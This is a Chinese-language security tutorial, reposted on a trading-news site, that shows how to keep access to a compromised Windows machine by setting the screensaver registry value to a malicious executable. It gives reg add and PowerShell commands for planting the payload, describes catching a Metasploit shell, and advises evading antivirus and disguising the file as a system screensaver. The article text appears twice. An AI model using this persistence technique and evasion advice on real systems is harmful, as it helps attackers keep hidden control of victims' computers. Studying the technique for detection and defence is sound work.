免费发布信息
当前位置:APP交易 > 热点资讯 > 资产交易 >  利用屏幕保护程序进行权限维持

利用屏幕保护程序进行权限维持

发表时间:2021-07-09 16:56:09  来源:红帽社区  浏览:次   【】【】【
红帽社区是一个垂直网络安全社区,融合“红帽先锋”正能量精神,每日分享最新安全资讯,提供安全问答、靶场、众测、漏洞库等功能,是网络安全爱好者学习、交流的优质社区。

0x00:简介

1、屏幕保护程序,当初的设计是为了防止长期屏幕的显示,预防老化与缩短屏幕显示器老化的一种保护程序。

2、攻击者可以利用屏幕保护程序来隐藏shell,达到一定的权限维持。

3、如果想长期隐藏,请作免杀处理

0x01:过程

1、屏幕保护的存放位置

Win32

Win64

2、制作恶意程序

然后放至受孩者的电脑上
(我这里是放到了C盘的tmp下)

3、通过CMD来植入恶意程序(注:本机测试请先备份好注册表)

利用代码:reg add “hkcu\control panel\desktop” /v SCRNSAVE.EXE /d c:\tmp\jjj.exe

投放完毕

4、设置监听

执行exploit
等待一分钟

shell到手

5、通过powershell来植入恶意程序(注:本机测试请先备份好注册表)

利用代码:
New-ItemProperty -Path ‘HKCU:\Control Panel\Desktop’ -Name ‘SCRNSAVE.EXE’ -Value ‘c:\tmp\jjj.exe’
执行前

执行后

投放完毕
MSF设置完监听
执行exploit
等待一分钟

shell到手

0x02:后话

1、就是用户在线使用电脑的情况下,是不会启动屏幕保护程序的,也就是说恶意程序会不起作用。
2、这种程序很容易就会被发现,建议可以做成跟系统相似的屏幕保护程序,便于隐藏。
3、建议做免杀处理
4、敌不动,我动。敌动,我不动

0x00:简介

1、屏幕保护程序,当初的设计是为了防止长期屏幕的显示,预防老化与缩短屏幕显示器老化的一种保护程序。

2、攻击者可以利用屏幕保护程序来隐藏shell,达到一定的权限维持。

3、如果想长期隐藏,请作免杀处理

0x01:过程

1、屏幕保护的存放位置

Win32

图片1.png

Win64

图片2.png

2、制作恶意程序

图片3.png

然后放至受孩者的电脑上
(我这里是放到了C盘的tmp下)

3、通过CMD来植入恶意程序(注:本机测试请先备份好注册表)

利用代码:reg add “hkcu\control panel\desktop” /v SCRNSAVE.EXE /d c:\tmp\jjj.exe

图片4.png

图片5.png

图片6.png

投放完毕

4、设置监听

图片7.png

执行exploit
等待一分钟

图片8.png

shell到手

5、通过powershell来植入恶意程序(注:本机测试请先备份好注册表)

利用代码:
New-ItemProperty -Path ‘HKCU:\Control Panel\Desktop’ -Name ‘SCRNSAVE.EXE’ -Value ‘c:\tmp\jjj.exe’
执行前

图片9.png

执行后

图片10.png

图片11.png

投放完毕
MSF设置完监听
执行exploit
等待一分钟

图片12.png

shell到手

0x02:后话

1、就是用户在线使用电脑的情况下,是不会启动屏幕保护程序的,也就是说恶意程序会不起作用。
2、这种程序很容易就会被发现,建议可以做成跟系统相似的屏幕保护程序,便于隐藏。
3、建议做免杀处理
4、敌不动,我动。敌动,我不动


责任编辑:
声明:本平台发布的内容(图片、视频和文字)以原创、转载和分享网络内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。

德品

1377 678 6470